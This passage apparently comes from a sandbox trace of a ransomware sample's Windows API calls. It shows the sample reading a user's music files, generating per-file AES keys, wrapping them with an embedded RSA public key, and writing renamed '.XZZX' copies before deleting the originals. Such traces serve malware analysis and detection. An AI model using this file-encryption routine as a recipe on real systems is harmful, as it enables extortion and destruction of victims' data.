wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0117.176] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x548) returned 0x0 [0117.176] RegQueryValueExW (in: hKey=0x548, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x6b, lpcbData=0x420dfdc*=0x4) returned 0x0 [0117.176] RegCloseKey (hKey=0x548) returned 0x0 [0117.176] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x548) returned 0x0 [0117.176] RegSetValueExW (in: hKey=0x548, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x6c, cbData=0x4 | out: lpData=0x420dfec*=0x6c) returned 0x0 [0117.176] RegCloseKey (hKey=0x548) returned 0x0 [0117.176] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.177] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.177] CloseHandle (hObject=0x53c) returned 1 [0117.179] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0117.179] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0117.179] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\2zrmbovjou.wav")) returned 1 [0117.180] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\2zrMBovJou.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\2zrmbovjou.wav")) returned 0 Thread: id = 372 os_tid = 0x8d8 [0117.182] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.182] lstrcpyW (in: lpString1=0x434f460, lpString2="btD83YaGWQR.m4a" | out: lpString1="btD83YaGWQR.m4a") returned="btD83YaGWQR.m4a" [0117.182] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.182] SetErrorMode (uMode=0x1) returned 0x1 [0117.182] lstrcpyW (in: lpString1=0x434f860, lpString2="btD83YaGWQR.m4a" | out: lpString1="btD83YaGWQR.m4a") returned="btD83YaGWQR.m4a" [0117.183] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x25e7413f, Data2=0x9226, Data3=0x4435, Data4=([0]=0x92, [1]=0xb, [2]=0xfa, [3]=0xfc, [4]=0xbb, [5]=0xbb, [6]=0x55, [7]=0x9c))) returned 0x0 [0117.183] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a") returned 88 [0117.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0117.183] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\83899D5A26F059DE25E7413F2B253E26.XZZX") returned 110 [0117.183] StrStrW (lpFirst="btD83YaGWQR.m4a", lpSrch="XZZX") returned 0x0 [0117.183] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a", dwFileAttributes=0x20) returned 1 [0117.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btd83yagwqr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x544 [0117.184] ReadFile (in: hFile=0x544, lpBuffer=0x3cbdfd0, nNumberOfBytesToRead=0x797d, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cbdfd0*, lpNumberOfBytesRead=0x434e418*=0x797d, lpOverlapped=0x0) returned 1 [0117.185] CloseHandle (hObject=0x544) returned 1 [0117.185] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0117.186] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0117.186] SetErrorMode (uMode=0x1) returned 0x1 [0117.186] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0117.187] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc5cc8) returned 1 [0117.189] CryptGenKey (in: hProv=0x3cc5cc8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0117.387] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0117.387] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0117.387] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.388] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0117.388] CryptDestroyKey (hKey=0x3a5710) returned 1 [0117.388] CryptReleaseContext (hProv=0x3cc5cc8, dwFlags=0x0) returned 1 [0117.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\83899D5A26F059DE25E7413F2B253E26.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\83899d5a26f059de25e7413f2b253e26.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54c [0117.388] WriteFile (in: hFile=0x54c, lpBuffer=0x3cbdfd0*, nNumberOfBytesToWrite=0x797d, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cbdfd0*, lpNumberOfBytesWritten=0x434e438*=0x797d, lpOverlapped=0x0) returned 1 [0117.389] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x797d [0117.389] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0117.389] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7982 [0117.389] WriteFile (in: hFile=0x54c, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x1e, lpOverlapped=0x0) returned 1 [0117.389] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x79a0 [0117.390] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0117.390] SetFilePointer (in: hFile=0x54c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x79a5 [0117.390] SetErrorMode (uMode=0x1) returned 0x1 [0117.390] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0117.390] OutputDebugStringW (lpOutputString="end") [0117.390] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0117.390] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0117.390] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cc5cc8) returned 1 [0117.390] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc5cc8, dwCertEncodingType=0x1, pInfo=0x3cb08c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb08f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0900*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a5810) returned 1 [0117.390] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.391] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0117.391] CryptEncrypt (in: hKey=0x3a5810, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0117.391] CryptEncrypt (in: hKey=0x3a5810, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc5d50*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc5d50*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0117.391] WriteFile (in: hFile=0x54c, lpBuffer=0x3cc5d50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc5d50*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0117.391] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0117.391] WriteFile (in: hFile=0x54c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0117.391] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0117.391] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0117.392] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x550) returned 0x0 [0117.392] RegQueryValueExW (in: hKey=0x550, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x6c, lpcbData=0x434dfdc*=0x4) returned 0x0 [0117.392] RegCloseKey (hKey=0x550) returned 0x0 [0117.392] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x550) returned 0x0 [0117.392] RegSetValueExW (in: hKey=0x550, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x6d, cbData=0x4 | out: lpData=0x434dfec*=0x6d) returned 0x0 [0117.392] RegCloseKey (hKey=0x550) returned 0x0 [0117.392] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.392] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.392] CloseHandle (hObject=0x54c) returned 1 [0117.393] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0117.394] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0117.394] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btd83yagwqr.m4a")) returned 1 [0117.394] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\btD83YaGWQR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btd83yagwqr.m4a")) returned 0 Thread: id = 373 os_tid = 0x8dc [0117.395] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0117.395] lstrcpyW (in: lpString1=0x420f460, lpString2="BtnyH.mp3" | out: lpString1="BtnyH.mp3") returned="BtnyH.mp3" [0117.395] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0117.395] SetErrorMode (uMode=0x1) returned 0x1 [0117.395] lstrcpyW (in: lpString1=0x420f860, lpString2="BtnyH.mp3" | out: lpString1="BtnyH.mp3") returned="BtnyH.mp3" [0117.395] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa766339e, Data2=0x3e51, Data3=0x4ab3, Data4=([0]=0x80, [1]=0x53, [2]=0xde, [3]=0x16, [4]=0x3a, [5]=0x8f, [6]=0x14, [7]=0x38))) returned 0x0 [0117.395] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BtnyH.mp3") returned 82 [0117.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0117.395] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7D698FE122EFCA3A766339E164FE0EB.XZZX") returned 110 [0117.395] StrStrW (lpFirst="BtnyH.mp3", lpSrch="XZZX") returned 0x0 [0117.395] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BtnyH.mp3", dwFileAttributes=0x20) returned 1 [0117.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\BtnyH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\btnyh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0117.397] ReadFile (in: hFile=0x53c, lpBuffer=0x3cc9980, nNumberOfBytesToRead=0xd375, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesRead=0x420e418*=0xd375, lpOverlapped=0x0) returned 1 [0117.398] CloseHandle (hObject=0x53c) returned 1 [0117.398] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0117.398] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0117.399] SetErrorMode (uMode=0x1) returned 0x1 [0117.399] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0117.399] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc5dd8) returned 1 [0117.401] CryptGenKey (in: hProv=0x3cc5dd8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5710) returned 1 [0117.501] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.501] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x420e41c | out: pbData=0x40a0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0117.501] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.502] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0117.502] CryptDestroyKey (hKey=0x3a5710) returned 1 [0117.502] CryptReleaseContext (hProv=0x3cc5dd8, dwFlags=0x0) returned 1 [0117.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7D698FE122EFCA3A766339E164FE0EB.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\b7d698fe122efca3a766339e164fe0eb.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x53c [0117.503] WriteFile (in: hFile=0x53c, lpBuffer=0x3cc9980*, nNumberOfBytesToWrite=0xd375, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesWritten=0x420e438*=0xd375, lpOverlapped=0x0) returned 1 [0117.504] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd375 [0117.504] WriteFile (in: hFile=0x53c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.504] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd37a [0117.504] WriteFile (in: hFile=0x53c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x12, lpOverlapped=0x0) returned 1 [0117.504] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd38c [0117.504] WriteFile (in: hFile=0x53c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0117.504] SetFilePointer (in: hFile=0x53c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xd391 [0117.505] SetErrorMode (uMode=0x1) returned 0x1 [0117.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0117.505] OutputDebugStringW (lpOutputString="end") [0117.505] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0117.505] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0117.505] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc5dd8) returned 1 [0117.506] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc5dd8, dwCertEncodingType=0x1, pInfo=0x3cb0998*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb09c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb09d0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5850) returned 1 [0117.506] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0117.506] 